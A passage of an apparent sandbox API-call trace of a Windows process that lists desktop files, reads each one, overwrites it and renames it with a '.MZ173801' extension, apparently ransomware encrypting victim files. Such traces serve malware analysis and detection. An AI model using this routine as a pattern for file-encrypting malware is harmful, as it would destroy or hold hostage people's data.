QjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", cchWideChar=814, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 814 [0122.962] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", cchWideChar=814, lpMultiByteStr=0x242762c, cbMultiByte=814, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", lpUsedDefaultChar=0x0) returned 814 [0122.962] GetCurrentThreadId () returned 0x1358 [0122.962] GetCurrentThreadId () returned 0x1358 [0122.962] GetCurrentThreadId () returned 0x1358 [0122.963] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", cchWideChar=814, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 814 [0122.963] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", cchWideChar=814, lpMultiByteStr=0x242799c, cbMultiByte=814, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", lpUsedDefaultChar=0x0) returned 814 [0122.963] GetCurrentThreadId () returned 0x1358 [0122.963] GetCurrentThreadId () returned 0x1358 [0122.963] GetCurrentThreadId () returned 0x1358 [0122.963] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\BQ0-O.pptx" (normalized: "c:\\users\\fd1hvy\\desktop\\bq0-o.pptx"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x410 [0122.963] SetFilePointer (in: hFile=0x410, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f9a4*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x19f9a4*=0) returned 0x0 [0122.963] SetFilePointer (in: hFile=0x410, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f99c*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x19f99c*=0) returned 0x0 [0122.963] SetFilePointer (in: hFile=0x410, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f99c*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x19f99c*=0) returned 0x1763a [0122.964] SetFilePointer (in: hFile=0x410, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f99c*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x19f99c*=0) returned 0x0 [0122.964] ReadFile (in: hFile=0x410, lpBuffer=0x2431b30, nNumberOfBytesToRead=0x1763a, lpNumberOfBytesRead=0x19f9b0, lpOverlapped=0x0 | out: lpBuffer=0x2431b30*, lpNumberOfBytesRead=0x19f9b0*=0x1763a, lpOverlapped=0x0) returned 1 [0122.965] CloseHandle (hObject=0x410) returned 1 [0122.966] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\BQ0-O.pptx" (normalized: "c:\\users\\fd1hvy\\desktop\\bq0-o.pptx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x410 [0122.968] WriteFile (in: hFile=0x410, lpBuffer=0x23a47a0*, nNumberOfBytesToWrite=0x1763a, lpNumberOfBytesWritten=0x19f9bc, lpOverlapped=0x0 | out: lpBuffer=0x23a47a0*, lpNumberOfBytesWritten=0x19f9bc*=0x1763a, lpOverlapped=0x0) returned 1 [0122.970] CloseHandle (hObject=0x410) returned 1 [0122.970] MoveFileW (lpExistingFileName="C:\\Users\\FD1HVy\\Desktop\\BQ0-O.pptx" (normalized: "c:\\users\\fd1hvy\\desktop\\bq0-o.pptx"), lpNewFileName="C:\\Users\\FD1HVy\\Desktop\\BQ0-O.pptx.MZ173801" (normalized: "c:\\users\\fd1hvy\\desktop\\bq0-o.pptx.mz173801")) returned 1 [0122.971] GetCurrentThreadId () returned 0x1358 [0122.971] GetCurrentThreadId () returned 0x1358 [0122.971] GetCurrentThreadId () returned 0x1358 [0122.971] GetCurrentThreadId () returned 0x1358 [0122.971] GetCurrentThreadId () returned 0x1358 [0122.971] GetCurrentThreadId () returned 0x1358 [0122.971] FindNextFileW (in: hFindFile=0xa1b738, lpFindFileData=0x19fae8 | out: lpFindFileData=0x19fae8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5fd3fb80, ftCreationTime.dwHighDateTime=0x1d5fb6e, ftLastAccessTime.dwLowDateTime=0x5fd3fb80, ftLastAccessTime.dwHighDateTime=0x1d5fb6e, ftLastWriteTime.dwLowDateTime=0x5e0a3800, ftLastWriteTime.dwHighDateTime=0x1d5fb6e, nFileSizeHigh=0x0, nFileSizeLow=0x11de00, dwReserved0=0x4988e787, dwReserved1=0x0, cFileName="Cheats_Loader_protected.exe", cAlternateFileName="CHEATS~1.EXE")) returned 1 [0122.971] FileTimeToLocalFileTime (in: lpFileTime=0x19fafc, lpLocalFileTime=0x19fa5c | out: lpLocalFileTime=0x19fa5c) returned 1 [0122.971] FileTimeToDosDateTime (in: lpFileTime=0x19fa5c, lpFatDate=0x19faca, lpFatTime=0x19fac8 | out: lpFatDate=0x19faca, lpFatTime=0x19fac8) returned 1 [0122.971] FindNextFileW (in: hFindFile=0xa1b738, lpFindFileData=0x19fae8 | out: lpFindFileData=0x19fae8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7c8c54e0, ftCreationTime.dwHighDateTime=0x1d5e181, ftLastAccessTime.dwLowDateTime=0xd0487ac0, ftLastAccessTime.dwHighDateTime=0x1d5e14d, ftLastWriteTime.dwLowDateTime=0xd0487ac0, ftLastWriteTime.dwHighDateTime=0x1d5e14d, nFileSizeHigh=0x0, nFileSizeLow=0x1c42, dwReserved0=0x4988e787, dwReserved1=0x0, cFileName="cpaXWNDh4Pt4.mp4", cAlternateFileName="CPAXWN~1.MP4")) returned 1 [0122.971] FileTimeToLocalFileTime (in: lpFileTime=0x19fafc, lpLocalFileTime=0x19fa5c | out: lpLocalFileTime=0x19fa5c) returned 1 [0122.971] FileTimeToDosDateTime (in: lpFileTime=0x19fa5c, lpFatDate=0x19faca, lpFatTime=0x19fac8 | out: lpFatDate=0x19faca, lpFatTime=0x19fac8) returned 1 [0122.971] GetFileAttributesExW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\cpaXWNDh4Pt4.mp4" (normalized: "c:\\users\\fd1hvy\\desktop\\cpaxwndh4pt4.mp4"), fInfoLevelId=0x0, lpFileInformation=0x19f9f0 | out: lpFileInformation=0x19f9f0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7c8c54e0, ftCreationTime.dwHighDateTime=0x1d5e181, ftLastAccessTime.dwLowDateTime=0xd0487ac0, ftLastAccessTime.dwHighDateTime=0x1d5e14d, ftLastWriteTime.dwLowDateTime=0xd0487ac0, ftLastWriteTime.dwHighDateTime=0x1d5e14d, nFileSizeHigh=0x0, nFileSizeLow=0x1c42)) returned 1 [0122.971] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", cchWideChar=814, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 814 [0122.971] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", cchWideChar=814, lpMultiByteStr=0x242762c, cbMultiByte=814, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", lpUsedDefaultChar=0x0) returned 814 [0122.972] GetCurrentThreadId () returned 0x1358 [0122.972] GetCurrentThreadId () returned 0x1358 [0122.972] GetCurrentThreadId () returned 0x1358 [0122.972] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", cchWideChar=814, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 814 [0122.972] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", cchWideChar=814, lpMultiByteStr=0x242799c, cbMultiByte=814, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", lpUsedDefaultChar=0x0) returned 814 [0122.972] GetCurrentThreadId () returned 0x1358 [0122.973] GetCurrentThreadId () returned 0x1358 [0122.973] GetCurrentThreadId () returned 0x1358 [0122.973] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\cpaXWNDh4Pt4.mp4" (normalized: "c:\\users\\fd1hvy\\desktop\\cpaxwndh4pt4.mp4"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x410 [0122.973] SetFilePointer (in: hFile=0x410, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f9a4*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x19f9a4*=0) returned 0x0 [0122.973] SetFilePointer (in: hFile=0x410, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f99c*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x19f99c*=0) returned 0x0 [0122.973] SetFilePointer (in: hFile=0x410, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f99c*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x19f99c*=0) returned 0x1c42 [0122.973] SetFilePointer (in: hFile=0x410, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f99c*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x19f99c*=0) returned 0x0 [0122.973] ReadFile (in: hFile=0x410, lpBuffer=0x2431b30, nNumberOfBytesToRead=0x1c42, lpNumberOfBytesRead=0x19f9b0, lpOverlapped=0x0 | out: lpBuffer=0x2431b30*, lpNumberOfBytesRead=0x19f9b0*=0x1c42, lpOverlapped=0x0) returned 1 [0122.974] CloseHandle (hObject=0x410) returned 1 [0122.974] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\cpaXWNDh4Pt4.mp4" (normalized: "c:\\users\\fd1hvy\\desktop\\cpaxwndh4pt4.mp4"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x410 [0122.975] WriteFile (in: hFile=0x410, lpBuffer=0x2433b60*, nNumberOfBytesToWrite=0x1c42, lpNumberOfBytesWritten=0x19f9bc, lpOverlapped=0x0 | out: lpBuffer=0x2433b60*, lpNumberOfBytesWritten=0x19f9bc*=0x1c42, lpOverlapped=0x0) returned 1 [0122.976] CloseHandle (hObject=0x410) returned 1 [0122.976] MoveFileW (lpExistingFileName="C:\\Users\\FD1HVy\\Desktop\\cpaXWNDh4Pt4.mp4" (normalized: "c:\\users\\fd1hvy\\desktop\\cpaxwndh4pt4.mp4"), lpNewFileName="C:\\Users\\FD1HVy\\Desktop\\cpaXWNDh4Pt4.mp4.MZ173801" (normalized: "c:\\users\\fd1hvy\\desktop\\cpaxwndh4pt4.mp4.mz173801")) returned 1 [0123.119] GetCurrentThreadId () returned 0x1358 [0123.119] GetCurrentThreadId () returned 0x1358 [0123.119] GetCurrentThreadId () returned 0x1358 [0123.119] GetCurrentThreadId () returned 0x1358 [0123.119] GetCurrentThreadId () returned 0x1358 [0123.119] GetCurrentThreadId () returned 0x1358 [0123.119] FindNextFileW (in: hFindFile=0xa1b738, lpFindFileData=0x19fae8 | out: 